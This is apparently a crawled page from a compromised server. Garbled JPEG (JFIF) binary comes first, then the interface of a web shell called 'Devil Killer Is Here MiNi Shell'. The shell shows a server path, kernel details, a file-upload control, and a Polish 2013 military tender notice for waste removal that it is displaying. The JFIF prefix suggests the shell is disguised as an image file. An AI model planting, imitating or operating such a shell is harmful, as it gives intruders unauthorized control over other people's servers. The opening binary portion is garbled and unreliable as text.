JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131017/216521-N-2013.html

<p class="kh_header"><b>Mińsk Mazowiecki: USŁUGA WYWOZU NIECZYSTOŚCI  STAŁYCH KOMUNALNO - BYTOWYCH  Z KOMPLEKSÓW ADMINISTROWANYCH PRZEZ JEDNOSTKĘ WOJSKOWĄ 1131 
Sprawa nr - ZP/39/2013</b><br>
<b>Numer ogłoszenia: 216521 - 2013; data zamieszczenia: 17.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 1131 , 05-300 Mińsk Mazowiecki, woj. mazowieckie, tel. 25 74 74 510, faks 25 74 74 520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.23blt.sp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: WOJSKO.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA WYWOZU NIECZYSTOŚCI  STAŁYCH KOMUNALNO - BYTOWYCH  Z KOMPLEKSÓW ADMINISTROWANYCH PRZEZ JEDNOSTKĘ WOJSKOWĄ 1131 
Sprawa nr - ZP/39/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi wywozu nieczystości stałych  komunalno-bytowych w pojemnikach Wykonawcy z kompleksów wojskowych będących na zaopatrzeniu Jednostki Wojskowej 1131. 
W prowadzonym postępowaniu zamawiający dopuszcza składanie ofert częściowych   w ramach 4 zadań zgodnie z formularzem ofertowym i cenowym. Wykonawca może ubiegać się o zamówienie w ramach jednego lub więcej zadania. Każda część zamówienia będzie oceniana jako odrębna oferta.
Do obowiązków Wykonawcy należy:
Wyposażenie nieruchomości w sprawne, estetyczne, szczelne plastikowe lub metalowe pojemniki  do gromadzenia odpadów zgodnie z opisem wskazanym poniżej 
komunalnych niesegregowanych o kodzie 20 03 01 o pojemności :  
L.p.	Pojemność	Przewidziany rodzaj pojemnika
1.	5 m3	Typu U5 lub równoważny - metalowy 
2.	1,1 m3	Typu PA 1100 lub równoważny  - metalowy 
3.	0,12 m3	Typu MGB 110 lub równoważny - plastikowy


komunalnych segregowanych o kodach  20 01 02,  20 01 01,  20 01 39 typu
L.p.	Pojemność	Przewidziany rodzaj pojemnika
1.	1,1 m3 segregowane szkło	Typu MGB 1100 lub równoważny  - plastikowy 
2.	2,5 m3  segregowane papier i tektura  	Typu Euroleader 2,5 lub równoważny-   plastikowy
3.	2,5 m3  segregowane tworzywo sztuczne  	Typu Euroleader 2,5 lub równoważny-   plastikowy
4.	1,1 m3 segregowane papier	Typu MGB 1100 lub równoważny  - plastikowy
5.	1,1 m3 segregowane tworzywa sztuczne	Typu MGB 1100 lub równoważny   - plastikowy

Wywożenie  odpadów zgodnie z ustaloną częstotliwością, 
Odbieranie odpadów z pojemników oraz odpadów leżących poza pojemnikami w przypadku niezachowania ustalonej częstotliwości wywozu,
Sprzątnięcie porozsypywanych odpadów w trakcie opróżniania pojemników,
Prowadzenie rejestru ilości wywożonych nieczystości, w którym każdorazowy wywóz kwitował    będzie przedstawiciel zamawiającego.
Zamawiający dopuszcza składanie ofert równoważnych. Przez produkt równoważny należy rozumieć przedmiot zamówienia o parametrach, jakości wykonania, technologii wykonania nie gorszej niż 
wskazany w opisie przedmiotu zamówienia. Przedstawione parametry, nazwy handlowe  przedmiotu zmówienia stanowią minimum techniczne i jakościowe oczekiwane przez Zamawiającego i będą stanowiły podstawę oceny ewentualnych ofert równoważnych. W takim przypadku to na Wykonawcy ciąży obowiązek udowodnienia równoważności poprzez dołączenie do ofert kart charakterystyki lub opisów zaproponowanych artykułów

3.Do obowiązków zamawiającego należy:
zapewnienie utwardzonej powierzchni do ustawienia pojemników
zapewnienie należytego (w okresie zimowym wolnego od śniegu i lodu, nie zastawionego innymi pojazdami dojazdu do pojemników;
gromadzenie odpadów wyłącznie w pojemnikach;
ponoszenie odpowiedzialności za zaginięcie lub uszkodzenie pojemników spowodowane niewłaściwym użytkowaniem  lub dewastacją np. spalenie, kradzież, odkręcenie kółek, itp. 
4.Częstotliwość wywozu nieczystości, ilość i rodzaj pojemników, ilość wywiezionych nieczystości w czasie trwania umowy zgodnie dla poszczególnych zadań:

Zadanie I - KOMPLEKS MIŃSK MAZOWIECKI wywóz odpadów komunalnych stałych niesegregowanych (zmieszanych) - kod odpadu  20 03 01 i odpadów komunalnych stałych segregowanych typu: 
szkło - kod odpadu 20 01 02, 
papier i tektura - kod odpadu 20 01 01  
tworzywa sztuczne - kod odpadu 20 01 39 
z następujących kompleksów wojskowych administrowanych przez Jednostkę Wojskową 1131 w Mińsku Mazowieckim: 


  Miejscowość	Kompleks	Rodzaj pojemnika m3	Ilość pojemników	Przwidywana 
ilość wywiezionych nieczystości w okresie trwania umowy w m3	Częstotliwość wywozu
05-300 Mińsk Maz.- Kolonia Janów	K-0799	od 5m3	5	1300	raz w tygodniu
segregacja papier 2,5	1	7,5	na zgłoszenie tel.
segregacja plastik 2,5	1	7,5	na zgłoszenie tel.
segregacja szkło 1,1	1	2,2	na zgłoszenie tel.
05-300 Mińsk Maz. -Janów	K-6031	od 5m3	10	1820	raz w tygodniu
segregacja papier 2,5	2	10	na zgłoszenie tel.
segregacja plastik 2,5	2	10	na zgłoszenie tel.
segregacja szkło 1,1	2	2,2	na zgłoszenie tel.
05-300 Mińsk Maz. 
ul. Piękna 3	K-0115	do 1,1m3	2	26,4	raz w miesiącu
05-300  Mińsk Maz.  ul. Warszawska 287	K-1023	do 1,1m3	12	1372,8	2 razy w tygodniu
od 5m3	1	60	raz w miesiącu
segregacja papier 2,5	3	15	na zgłoszenie tel.
segregacja plastik 2,5	3	15	na zgłoszenie tel.
segregacja szkło 1,1	3	6,6	na zgłoszenie tel.
05-300 Mińsk Maz. 
ul. Warszawska 287 (Parafia)	K-1023	do 1,1m3	1	28,6	co 2 tygodnie

Zadanie 2 -  KOMPLEKS GARWOLIN 08-430; UL. KOŚCIUSZKI 28 - K-0187 wywóz odpadów komunalnych stałych niesegregowanych (zmieszanych) - kod odpadu  20 03 01 i odpadów komunalnych stałych segregowanych typu: 
szkło - kod odpadu 20 01 02, 
papier i tektura - kod odpadu 20 01 01  
tworzywa sztuczne - kod odpadu 20 01 39 
Miejscowość	Kompleks	Rodzaj pojemnika	Ilość pojemników	Przwidywana ilość wywiezionych nieczystości w okresie trwania umowy w m3
Częstotliwość wywozu

Garwolin   08-430    ul. Kościuszki 28	K-0187	do 1,1m3	1	28,6	co 2 tygodnie
		segregacja papier 1,1	1	13,2	raz w miesiącu
		segregacja plastik 1,1	1	3,3	na zgłoszenie tel.
		segregacja szkło 1,1	1	3,3	na zgłoszenie tel.

ZADANIE NR 3 - KOMPLEKS ŻYCZYN - wywóz odpadów komunalnych stałych niesegregowanych (zmieszanych) - kod odpadu  20 03 01 i odpadów komunalnych stałych segregowanych typu: 
papier i tektura - kod odpadu 20 01 01  
tworzywa sztuczne - kod odpadu 20 01 39 
Miejscowość	Kompleks	Rodzaj pojemnika	Ilość pojemników	Przwidywana ilość wywiezionych nieczystości w okresie trwania umowy w m3
Częstotliwość wywozu

Życzyn                            Podebłocie	K-0315	do 1,1 m3	3	39,6	raz w miesiącu
		segregacja papier 1,1	1	6,6	raz na 2 miesiące
		segregacja plastik 1,1	1	6,6	raz na 2 miesiące

Życzyn	K-0507	do 1,1m3	1	13,2	raz w miesiącu



ZADANIE NR 4 - SIEDLCE - wywóz odpadów komunalnych stałych niesegregowanych zmieszanych - 
kod odpadu  20 03 01.
Miejscowość	Kompleks	Rodzaj pojemnika	Ilość pojemników	Przwidywana ilość wywiezionych nieczystości w okresie trwania umowy w m3
Częstotliwość wywozu

Siedlce   08-110  ul. Składowa 39	K-0951	do 1,1m3	3	171,6	raz w tygodniu
do 1,1 m3	8	228,8	co 2 tygodnie
od 5 m3	1	130	co 2 tygodnie
Siedlce  08-110  ul. Wałowa 1	K-0952	do 1,1 m3	2	57,2	co 2 tygodnie
Siedlce -Grabianów	K-0955	do 1,1 m3	1	28,6	co 2 tygodnie
Siedlce  08-110 ul. Plac Tysiąclecia 1	K-0960	0,12 m3	2	6,24	co 2 tygodnie

Rozdział IV    Termin realizacji zamówienia i  Forma płatności              

Termin realizacji zamówienia:
od dnia podpisania umowy jednak nie wcześniej niż od 01.12.2013 do  30.11.2014r..

Wynagrodzenie będzie płatne z dołu na podstawie faktury WYKONAWCY, wystawionej na koniec danego miesiąca kalendarzowego stanowiący okres rozliczeniowy w oparciu o ilości wskazane w rejestrze wywozu odpadów komunalno-bytowych potwierdzonych każdorazowo przez przedstawiciela ZAMAWIAJĄCEGO. Oryginał rejestru za dany miesiąc będzie załączony do faktury. Ilości odpadów wyszczególnione w rejestrach wywozów odpadów powinny być zgodne z ilościami widniejącymi na fakturach. Zapłata wynagrodzenia wykonawcy nastąpi w terminie 30 dni (trzydziestu dni) od dnia każdorazowego otrzymania przez zamawiającego prawidłowo wystawionej faktury VAT.  Zapłata nastąpi na rachunek bankowy wykonawcy wynikający z faktury. Za dzień spełnienia świadczenia uznaje się dzień obciążenia rachunku bankowego zamawiającego. Jesteśmy płatnikami VAT.
Wszystkie wymagania zawarte w SIWZ na stronie Zamawiającego www.23blt.sp.mil.pl.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten spełnią wykonawcy, którzy posiadają: 
aktualny wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez wójta, burmistrza lub prezydenta miasta, o którym mowa w art. 9b ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach tj. Dz. U. z 2012 r. poz.391 z późn. zm.  wymagany dokument potwierdzający wpis do w/w rejestru na terenie gmin objętych przedmiotem zamówienia: 
dla zadania I - gm. Mińsk Mazowiecki 
dla zadania II - gm. Garwolin
dla zadania III- gm.  Trojanów
dla zadania IV- gm. Siedlce

Wykonawca ma obowiązek posiadania stosownych zezwoleń, pozwoleń, zgód, zgłoszeń, koncesji, licencji itp. zwanych dalej zezwoleniami przez cały okres trwania umowy oraz ich okazywania zamawiającemu na każde jego wezwanie. W przypadku, gdyby którekolwiek z dotychczasowych zezwoleń wygasło lub zostało cofnięte w okresie obowiązywania niniejszej umowy, wykonawca zobowiązany jest przedstawić nowe zezwolenie w tym zakresie, nie później niż w ostatnim dniu obowiązywania dotychczasowego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią wykonawcy, którzy złożą oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią wykonawcy, którzy  dysponują: 
Dla zadania Nr 1 
Co najmniej 31 szt.  pojemnikami do gromadzenia odpadów komunalnych   niesegregowanych  o kodzie 20 03 01 w pojemnikach zgodnych z opisem przedmiotu zamówienia w Rozdziale 3 pkt 2: 
o pojemności 5 m3 	-  16 szt.  
o pojemności 1,1 m3 	 - 15 szt.				
oraz co najmniej 18 pojemnikami  zgodnych z opisem przedmiotu zamówienia w Rozdziale 3 pkt 2 do gromadzenia odpadów komunalnych  segregowanych  :
szkło - kod odpadu 20 01 02 			-  o pojemności  1,1 m3 - 6 szt., 
papier i tektura - kod odpadu 20 01 01		-  o pojemności  2,5 m3 - 6 szt.
tworzywa sztuczne - kod odpadu 20 01 39 	- o pojemności 2,5 m3 - 6 szt.
 
Dla zadania Nr  2 
Co najmniej 1 szt.  pojemnika do gromadzenia odpadów komunalnych niesegregowanych  o kodzie 20 03 01,|
 w pojemnikach zgodnych z opisem przedmiotu zamówienia w Rozdziale 3 pkt 2 : .
o pojemności 1,1 m3 	 - 1 szt.				
oraz co najmniej 3 pojemnikami  do gromadzenia odpadów komunalnych  segregowanych zgodnych z opisem przedmiotu zamówienia w Rozdziale 3 pkt 2,  o kodach : 
szkło - kod odpadu 20 01 02 			    -  o pojemności  1,1 m3 - 1 szt., 
papier i tektura - kod odpadu 20 01 01	    -  o pojemności  1,1 m3- 1 szt.
tworzywa sztuczne - kod odpadu 20 01 39   - o pojemności   1,1 m3- 1 szt.
Dla zadania Nr 3  
Co najmniej 4 szt.  pojemników zgodnych z opisem przedmiotu zamówienia w Rozdziale 3 pkt 2 do gromadzenia odpadów komunalnych niesegregowanych  o kodzie 20 03 01:  
o pojemności 1,1 m3 	 - 4 szt.				
oraz co najmniej 2 pojemnikami  do gromadzenia odpadów komunalnych  segregowanych w pojemnikach  zgodnych z opisem przedmiotu zamówienia w Rozdziale 3 pkt 2,  o kodach : 
papier i tektura - kod odpadu 20 01 01	-  o pojemności  1,1 m3- 1 szt.
tworzywa sztuczne - kod odpadu 20 01 39 	- o pojemności   1,1 m3- 1 szt.
Dla zadania Nr 4 
Co najmniej 31 szt.  pojemników zgodnych z opisem przedmiotu zamówienia w Rozdziale 3 pkt 2  |
do gromadzenia odpadów komunalnych niesegregowanych  o kodzie 20 03 01: 
o pojemności 5 m3 	 -  1 szt.
o pojemności 1,1 m3	 - 14 szt.				
o pojemności 0,12 m3	 -   2 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią wykonawcy, którzy złożą oświadczenie w trybie art.22 ust.1 ustawy Prawo zamówień publicznych załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią wykonawcy, którzy złożą oświadczenie 
w trybie art.22 ust.1 ustawy  Prawo zamówień publicznych (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>aktualny wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez wójta, burmistrza lub prezydenta miasta, o którym mowa w art. 9b ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach tj. (Dz. U. z 2012 r. poz. 391 z późn. zm.) - wymagany dokument potwierdzający wpis do w/w rejestru na terenie gmin objętych przedmiotem zamówienia: 
- dla zadania I - gm. Mińsk Mazowiecki; 
- dla zadania II - gm. Garwolin
- dla zadania III- gm. Trojanów
- dla zadania IV- gm. Siedlce
2. Zamawiający dopuszcza składanie ofert równoważnych. Przez produkt równoważny należy rozumieć przedmiot zamówienia o parametrach, jakości wykonania, technologii wykonania nie gorszej niż 
wskazany w opisie przedmiotu zamówienia. Przedstawione parametry, nazwy handlowe  przedmiotu zmówienia stanowią minimum techniczne i jakościowe oczekiwane przez Zamawiającego i będą stanowiły podstawę oceny ewentualnych ofert równoważnych. W takim przypadku to na Wykonawcy ciąży obowiązek udowodnienia równoważności poprzez dołączenie do ofert kart charakterystyki lub opisów zaproponowanych artykułów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.23blt.sp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 1131
05-300 Mińsk Mazowiecki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2013 godzina 11:00, miejsce: Jednostka Wojskowa 1131
05-300 Mińsk Mazowiecki
w Kancelarii Jawnej w dni robocze w godzinach od 7:30 do 15:30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KOMPLEKS MIŃSK MAZOWIECKI wywóz odpadów komunalnych stałych niesegregowanych zmieszanych - kod odpadu  20 03 01 i odpadów komunalnych stałych segregowanych typu: 
szkło - kod odpadu 20 01 02, 
papier i tektura - kod odpadu 20 01 01  
tworzywa sztuczne - kod odpadu 20 01 39.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KOMPLEKS MIŃSK MAZOWIECKI wywóz odpadów komunalnych stałych niesegregowanych zmieszanych - kod odpadu  20 03 01 i odpadów komunalnych stałych segregowanych typu: 
szkło - kod odpadu 20 01 02, 
papier i tektura - kod odpadu 20 01 01  
tworzywa sztuczne - kod odpadu 20 01 39 
z następujących kompleksów wojskowych administrowanych przez Jednostkę Wojskową 1131 w Mińsku Mazowieckim: 

       Miejscowość	Kompleks	Rodzaj pojemnika m3	Ilość pojemników	Przwidywana ilość wywiezionych nieczystości w okresie trwania umowy w m3	Częstotliwość wywozu
05-300 Mińsk Maz.- Kolonia Janów	K-0799	od 5m3	5	1300	raz w tygodniu
		segregacja papier 2,5	1	7,5	na zgłoszenie tel.
		segregacja plastik 2,5	1	7,5	na zgłoszenie tel.
		segregacja szkło 1,1	1	2,2	na zgłoszenie tel.
05-300 Mińsk Maz. -Janów	K-6031	od 5m3	10	1820	raz w tygodniu
		segregacja papier 2,5	2	10	na zgłoszenie tel.
		segregacja plastik 2,5	2	10	na zgłoszenie tel.
		segregacja szkło 1,1	2	2,2	na zgłoszenie tel.
05-300 Mińsk Maz. 
ul. Piękna 3	K-0115	do 1,1m3	2	26,4	raz w miesiącu
05-300  Mińsk Maz.  ul. Warszawska 287	K-1023	do 1,1m3	12	1372,8	2 razy w tygodniu
		od 5m3	1	60	raz w miesiącu
	segregacja papier 2,5	3	15	na zgłoszenie tel.
	segregacja plastik 2,5	3	15	na zgłoszenie tel.
	segregacja szkło 1,1	3	6,6	na zgłoszenie tel.
05-300 Mińsk Maz. 
ul. Warszawska 287 Parafia	K-1023	do 1,1m3	1	28,6	co 2 tygodnie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
